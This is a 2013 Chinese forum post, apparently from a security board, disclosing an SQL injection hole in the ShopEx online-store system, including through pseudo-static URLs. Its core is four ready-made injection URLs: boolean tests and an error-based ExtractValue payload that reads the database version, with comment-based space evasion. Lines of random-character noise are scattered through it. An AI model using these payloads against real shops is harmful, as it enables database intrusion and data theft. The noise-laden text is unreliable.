注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
9 a! Q7 n1 ~3 c1 Y: E# S4 k% E( g. |0 W
好吧,我扯远了~~
# _/ P; {5 i0 H% O% x& ~7 F l其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~0 X' x# O9 @3 V' Q& \1 C! L; t* Q3 d: n) f
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: - i1 M f& x s4 D. o/ W5 X
! O V/ t0 K0 ^4 z Khttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html ) p+ x' ^5 M* ~/ \4 t: S7 k
( B; i1 N8 p/ ~' l% P& J9 Whttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 4 z4 N0 V' l( v$ @* h
6 v: n# G8 q, E1 J9 \! ihttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 1 H& z$ \! H- w$ i9 S0 I
% \) @% I0 K) m+ R2 _9 j& u8 ]4 c1 v# {2 n
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
3 V5 `" F1 [. s/ {* p2 a& V' s0 M1 B0 \- n' b$ D5 q
1 }1 L% v1 t0 k3 r5 C
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。2 H7 y8 o4 l7 p$ P/ W6 x7 B$ J
如何注入就不多说了,10多年的东西了…不会也会了…
$ F7 N" H9 M: n! ]
* t4 f, ?4 e, }/ ]9 G
, ~1 I) R r; t& D/ d7 |$ E& x% q
! z. S1 o/ U* B( f T* Q* D1 `, y- [% m: C$ r
|
发表于 2013-2-19 08:31:27
收藏
支持
反对